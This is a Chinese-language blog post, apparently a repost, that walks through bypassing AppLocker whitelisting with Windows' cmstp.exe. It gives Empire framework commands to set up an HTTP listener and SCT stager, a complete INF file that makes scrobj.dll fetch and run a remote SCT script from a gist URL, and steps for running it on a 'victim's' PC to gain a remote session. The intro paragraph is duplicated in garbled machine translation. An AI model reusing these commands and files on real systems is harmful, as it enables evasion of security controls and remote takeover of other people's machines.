首页 > 其他 > 详细

使用cmstp绕过应用程序白名单

时间:2019-03-08 10:02:55      阅读:224      评论:0      收藏:0      [点我收藏+]

默认情况下,Applocker允许在文件夹中执行二进制文件,这是可以绕过它的主要原因。已经发现,可以容易地使用这样的二进制文件以便与UAC一起绕过Applocker。与Microsoft相关的二进制文件之一是CMSTP。CMSTP欢迎INF文件,因此可以通过INF进行利用。因此,我们将学习如何进行此类开发。

默认情况下,AppLocker允许在文件夹中执行二进制文件,这是可以绕过它的主要原因。已经发现,这样的二进制文件可以很容易地用于绕过AppLocker和UAC。与Microsoft相关的二进制文件之一是CMSTP。CMSTP welcomes INF文件,因此通过INF进行开发是可能的。因此,我们将学习如何进行此类开发。

众所周知,CMSTP接受SCT文件,然后无提示地运行,因此我们将创建一个恶意的SCT文件以实现我们的目标。为此,我们将使用Empire PowerShell。有关Empire PowerShell的详细指南,请单击此处

从Kali终端启动Empire框架,然后输入以下命令以创建恶意软件:

 

listeners
uselistener http
set Host 192.168.1.109
execute

 

技术分享图片

上面的命令将为您创建一个侦听器,然后键入back以从侦听器接口返回,并且创建SCT文件类型:

usestager windows/launcher_sct
set Listener HTTP
execute

运行上述漏洞将创建SCT文件。我们将使用以下脚本在PowerShell中执行文件。在此脚本中,给出SCT文件的路径,并添加以下行代码,如图所示:

这里下载此脚本

;cmstp.exe /s cmstp.inf

[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://gist.githubusercontent.com/NickTyrer/0604bb9d7bcfef9e0cf82c28a7b76f0f/raw/676451571c203303a95b95fcb29c8b7deb8a66e0/powersct.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"
 

 技术分享图片

现在,将文件发送到受害者的PC,并在受害者的命令提示符下运行以下命令:

cmstp.exe /s shell.inf

技术分享图片

一旦运行该命令,您将拥有一个会话。使用以下命令访问会话:

 

interact <session name>

 

这样,您可以使用CMSTP二进制文件来绕过applocker限制。CMSTP需要一个INF文件,并且利用它可以帮助您访问受害者的PC。

技术分享图片

 
 

使用cmstp绕过应用程序白名单

原文:https://www.cnblogs.com/backlion/p/10493914.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!